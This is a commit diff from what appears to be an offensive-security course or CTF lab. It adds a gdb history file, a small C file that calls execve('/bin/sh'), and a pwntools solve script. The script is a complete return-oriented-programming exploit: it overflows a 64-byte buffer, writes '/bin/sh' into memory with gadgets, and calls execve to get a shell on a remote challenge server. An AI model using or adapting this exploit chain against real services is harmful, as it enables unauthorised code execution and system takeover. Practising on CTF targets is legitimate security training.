rop and lab3_4_recap

rop/04_arsenal/.gdb_history

@@ -0,0 +1,8 @@
+quit
+disass main
+disass vuln
+r
+disass vuln
+disass main
+vmmap
+quit

rop/04_arsenal/solve.py

@@ -0,0 +1,38 @@
+from pwn import *
+
+OFF = 64
+context.binary = elf = ELF("./arsenal", checksec=False)
+shellstr = b"/bin/sh\x00"
+ret = 0x000000000040101A
+pop_rdi = 0x000000000040196E
+pop_rsi = 0x0000000000401977
+pop_rdx = 0x0000000000401980
+pop_rax = 0x0000000000401989  # Assign 59 (execve) to rax
+syscall = 0x0000000000401324
+WRITE_ADDR = 0x4AA000
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13594)
+print(p.recvuntil(b"[arsenal] The armory is open -- pick your weapons:\n"))
+mov_qword_ptr_rdx_rax = 0x000000000040AB18  # mov qword ptr [rdx], rax; ret
+payload = flat(
+    b"A" * OFF,
+    p64(ret),
+    p64(pop_rdx),
+    p64(WRITE_ADDR),
+    p64(pop_rax),
+    shellstr,
+    p64(mov_qword_ptr_rdx_rax),  # Write /bin/sh to a writable address in memory
+    p64(pop_rax),
+    p64(0x3B),  # 59 is the execve syscall
+    p64(pop_rdi),
+    p64(
+        WRITE_ADDR
+    ),  # Address where I wrote /bin/sh so in RDI there is a pointer (char*)
+    p64(pop_rsi),
+    p64(0),
+    p64(pop_rdx),
+    p64(0),
+    p64(syscall),
+)
+p.sendline(payload)
+p.interactive()

rop/04_arsenal/test.c

@@ -0,0 +1,6 @@
+#include <unistd.h>
+#include <stdio.h>
+int main(){
+    execve("/bin/sh",0,0);
+    return 0;
+}